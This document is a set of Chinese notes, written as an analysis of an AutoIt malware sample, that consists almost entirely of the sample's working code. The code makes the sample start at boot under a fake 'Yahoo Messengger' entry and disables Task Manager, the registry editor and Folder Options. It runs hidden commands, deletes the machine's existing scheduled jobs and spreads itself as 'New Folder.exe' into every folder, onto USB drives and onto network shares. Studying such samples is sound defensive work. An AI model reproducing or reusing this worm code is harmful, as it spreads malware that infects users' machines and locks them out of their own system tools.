AutoIt在线文档

https://www.autoitx.com/Doc/

注册表行为

设置开机自启

1
2
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)

禁用“设置”菜单中的“文件夹选项”

1
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1)

禁用任务管理器

1
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)

禁用注册表

1
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)

设置计划任务永不停止

1
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)

读取局域网共享文件设置

1
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared")

计划任务行为

用到的函数

注:CMD以隐藏窗口模式执行命令

1
2
3
Func _RunDOS($sCommand)
    Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc   ;==>_RunDOS

取消所有已计划命令

1
_RunDOS ("AT /delete /yes")

定时运行样本

1
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)

横向传播行为

用到的函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Func Search($current)
    Local $search = FileFindFirstFile($current & "\*.*")
    ; 遍历目录所有文件,如果是目录则将样本复制到该目录中,并且样本名字为目录名+$exe
    While 1
        Dim $file = FileFindNextFile($search)
        If @error Or StringLen($file) < 1 Then ExitLoop
        If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then 
            ; 判断如果为文件夹且不是.目录和..目录时将样本复制到该目录下名为"目录名.exe"
            FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
            Search($current & "\" & $file)
        EndIf

        Sleep (1)
    WEnd
    FileClose($search)
EndFunc

U盘横向传播

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Func copyusb()
    Dim $usb[10]
    $usb[0]=""
    $usb[1]=""
    $usb[2]=""
    ; 获取可移动驱动器
    $odia = DriveGetDrive("REMOVABLE")
    If NOT @error Then
        For $i=1 To $odia[0]
            $usb[$i]=$odia[$i]
        Next
        If $usb[1] <>"A:" Then
            If $usb [1] <>"" Then
                FileCopy (@WindowsDir & "\" & $name & $exe,$usb[1] & "\New Folder.exe",0)
                Search($usb[1])
            EndIf
        EndIf
        If $usb[1]="A:" Then
            If $usb[2]<>"" Then
                FileCopy (@WindowsDir & "\" & $name & $exe,$usb[2] & "\New Folder.exe",0)
                Search($usb[2])
            EndIf
        EndIf
    EndIf
EndFunc

局域网横向传播

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Func copynetwork ()
    Dim $mang[30]
    For $i=1 to 30
        $read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares",$i) ; 遍历key
        If @error Then ExitLoop
        $read = StringReplace ($read,"/","\") ; 替换字符串"/""\"
        $mang[$i] = "\\" & $read
        $checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1) ; 将RVHOST.exe复制到该共享目录下覆盖为New Folder.exe
        ; 如果成功则开始局域网扩散
        If $checkcopy =1 Then
            Search($mang[$i])
        EndIf
    Next
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared","REG_SZ",$mang[$i-1] & "\New Folder.exe")
EndFunc